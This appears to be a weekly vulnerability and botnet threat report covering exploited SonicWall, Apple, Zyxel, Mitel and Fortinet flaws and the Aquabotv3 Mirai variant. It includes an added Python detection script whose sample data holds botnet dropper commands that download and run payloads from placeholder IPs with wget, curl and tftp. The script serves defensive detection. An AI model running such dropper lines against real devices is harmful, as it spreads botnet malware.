Executive Summary
This week, CISA expanded its Known Exploited Vulnerabilities (KEV) catalog with two critical additions, one affecting SonicWall and another targeting Apple, both of which were actively exploited as zero-days. Meanwhile, GreyNoise flagged active exploitation attempts in Zyxel CPE devices and multiple Fortinet products, signaling ongoing threats in enterprise security.
The botnet ecosystem remains relentless, with EnemyBot and Sysrv-K exploiting vulnerabilities in Spring Cloud Gateway, while Mozi, Andr0xgh0st, Tsunami, Spytech Necro, and Sysrv targeted Atlassian products.
In a concerning development, the Mirai-based Aquabot botnet has evolved into a new variant, Aquabotv3, which is actively targeting Mitel SIP phones and exploiting known vulnerabilities across various devices. Researchers have also identified that the Mirai botnet is exploiting an unpatched flaw in Zyxel CPE devices, enabling it to launch large-scale IoT-driven DDoS attacks.
With escalating exploitation trends and botnets adapting rapidly, organizations must stay vigilant, prioritize patching, and bolster their defenses against these evolving threats.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping organizations make informed decisions.
A Deserialization of Untrusted Data Vulnerability has been identified in SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC), affecting versions 12.4.3-02804 and earlier. Discovered and reported by the Microsoft Threat Intelligence Center (MSTIC) as a zero-day, this flaw allows unauthenticated attackers to execute arbitrary code on vulnerable devices, posing a severe security risk. With a CVSS score of 9.8, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, emphasizing the urgent need for mitigation.
A Use-After-Free Vulnerability in Apple's Core Media component could enable a malicious application already installed on the device to escalate its privileges. Apple has released a security update to address this vulnerability, which was actively exploited as a zero-day. In response, CISA has added it to the KEV catalog, urging users to apply the patch promptly to mitigate potential risks.
A Command Injection Vulnerability in Zyxel CPE devices allows attackers to execute arbitrary commands, potentially leading to full system compromise, data exfiltration, or network infiltration. Despite being first reported by VulnCheck in 2024, this flaw remains unpatched and unacknowledged by the vendor, increasing the risk of exploitation. Recently, GreyNoise has observed active attacks targeting this vulnerability, highlighting the urgency for organizations to implement mitigations, such as restricting access to administrative interfaces and monitoring for suspicious activity.
A Command Injection Vulnerability affecting Mitel 6800, 6900 and 6900w series SIP phones, including the 6970 Conference Unit, could enable attackers to execute arbitrary commands within the phone's environment. In August 2024, Kyle Burns of PacketLabs released a proof-of-concept (PoC) exploit code demonstrating that the flaw stemmed from improper sanitization of user-supplied input. According to a recent report from Akamai, the first known exploitation attempts targeting this vulnerability emerged in January 2025, roughly six months after its initial disclosure. The vulnerability is now under active exploitation, with attacks leveraging it to gain control over vulnerable devices.
An Authentication Bypass Vulnerability in Fortinet FortiOS, FortiProxy and FortiSwitchManager enables unauthenticated attackers to perform administrative operations via specially crafted HTTP or HTTPS requests. Although Fortinet released patches in October 2022, thousands of devices remain unpatched: GreyNoise has identified over 15,000 exposed Fortinet FortiGate firewalls, and attackers are actively exploiting the flaw for malicious purposes.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Vulnerabilities exploited by botnets were identified, including recent CVEs logged in MISP. The top 5 CVEs are presented whose payloads are suggestive of botnet activity, such as invoking wget against a raw IP address.
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
According to GreyNoise Security, researchers have found a striking overlap between IPs leveraging CVE-2024-40891 and those previously associated with Mirai botnet operations. This indicates that certain strains of Mirai have adopted the exploit, significantly increasing their potential for massive IoT-driven DDoS campaigns.
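As an added example, not part of the original report or of Loginsoft's or GreyNoise's tooling, the following Python script applies the two heuristics this report describes to constructed sensor records: it flags payloads that fetch a second stage with wget, curl or tftp from a raw IP literal (the "wget with IP addresses" signal used for the botnet CVE ranking above), ranks CVEs by how many such payloads hit them, and measures the overlap between the source IPs seen against a given CVE and a list of IPs already attributed to Mirai. Every IP, CVE tag and payload in the sample data is a constructed placeholder (TEST-NET ranges), and the event field names src, cve and payload are assumptions.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample sensor records (not real Loginsoft telemetry).
# Field names are assumptions; IPs use documentation ranges.
SAMPLE_EVENTS = [
    {"src": "203.0.113.10", "cve": "CVE-2024-40891",
     "payload": "cd /tmp; wget http://198.51.100.7/bins/arm7; chmod +x arm7; ./arm7"},
    {"src": "203.0.113.11", "cve": "CVE-2024-40891",
     "payload": "curl -s http://198.51.100.7/x.sh | sh"},
    {"src": "203.0.113.12", "cve": "CVE-2024-41710",
     "payload": "wget http://example.test/update.bin"},      # hostname, not an IP literal
    {"src": "203.0.113.13", "cve": "CVE-2024-41710",
     "payload": "tftp -g -r mips 198.51.100.9"},
    {"src": "203.0.113.14", "cve": "CVE-2022-40684",
     "payload": "GET /api/v2/cmdb/system/admin HTTP/1.1"},   # no downloader at all
    {"src": "203.0.113.10", "cve": "CVE-2018-10561",
     "payload": "wget http://198.51.100.7/bins/mips -O /tmp/m"},
]

# Constructed placeholder list of IPs previously attributed to Mirai activity.
KNOWN_MIRAI_IPS = {"203.0.113.10", "203.0.113.13", "203.0.113.99"}

# A downloader command followed, within the same shell statement, by an IPv4 literal.
DOWNLOADER = r"\b(?:wget|curl|tftp|ftpget)\b"
IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
PATTERN = re.compile(rf"{DOWNLOADER}[^\n;|&]*?\b({IPV4})\b", re.IGNORECASE)


def botnet_indicator(payload):
    """Return the IP literal a downloader in the payload fetches from, or None.

    Botnet droppers typically pull stages from bare IPs rather than domains,
    so a downloader paired with an IP literal is the signal used here.
    """
    for m in PATTERN.finditer(payload):
        try:
            ip = ipaddress.ip_address(m.group(1))   # rejects e.g. 300.1.1.1
        except ValueError:
            continue
        return str(ip)
    return None


def top_botnet_cves(events, n=5):
    """Rank CVEs by the number of events whose payload carries a botnet-style downloader."""
    counts = Counter(e["cve"] for e in events if botnet_indicator(e["payload"]))
    return counts.most_common(n)


def downloader_hosts(events):
    """Count the IP literals payloads download from (candidates for blocklisting)."""
    return Counter(ip for e in events if (ip := botnet_indicator(e["payload"])))


def ip_overlap(events, cve, known_ips):
    """Compare sources seen exploiting `cve` against a known-botnet IP set.

    A high share indicates the exploit has been folded into that botnet's toolkit.
    """
    sources = {e["src"] for e in events if e["cve"] == cve}
    shared = sources & known_ips
    return {
        "sources": sources,
        "shared": shared,
        "share": len(shared) / len(sources) if sources else 0.0,
    }


if __name__ == "__main__":
    print("Top botnet CVEs:", top_botnet_cves(SAMPLE_EVENTS))
    print("Download hosts:", downloader_hosts(SAMPLE_EVENTS))
    print("Mirai overlap for CVE-2024-40891:",
          ip_overlap(SAMPLE_EVENTS, "CVE-2024-40891", KNOWN_MIRAI_IPS))
```

On real sensor data the same functions run unchanged over a list of decoded request records; the pattern deliberately stops at `;`, `|` and `&` so that a downloader in one shell statement is not paired with an IP from a later one, and a hostname-based download is not flagged, which keeps false positives from legitimate update traffic low.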
Aquabotv3: The Evolving Threat Targeting Mitel SIP Phones
The Akamai Security Intelligence and Response Team (SIRT) has uncovered a new variant of the Mirai-based malware, Aquabot, which is actively exploiting Mitel SIP phones. This latest evolution, identified as Aquabotv3, marks the third distinct iteration of this botnet malware. The botnet primarily targets CVE-2024-41710, a command injection vulnerability affecting Mitel devices. However, its exploitation efforts extend beyond this flaw, also leveraging vulnerabilities such as CVE-2023-26801, CVE-2022-31137, CVE-2018-10561, CVE-2018-10562, CVE-2018-17532 and a remote code execution vulnerability in Linksys E-series devices.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database (NVD). The LOVI Platform aggregates and distributes data from open sources and social media; it currently tracks over 100 security alerts and plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/01/29/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2025/01/24/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.akamai.com/blog/security-research/2025-january-new-aquabot-mirai-variant-exploiting-mitel-phones
- https://www.greynoise.io/blog/hackers-actively-exploiting-fortinet-firewalls-real-time-insights-from-greynoise
- https://vulncheck.com/blog/initial-access-intelligence-july-2024
- https://www.theregister.com/2025/01/28/apple_cve_2025_24085/
- https://www.greynoise.io/blog/active-exploitation-of-zero-day-zyxel-cpe-vulnerability-cve-2024-40891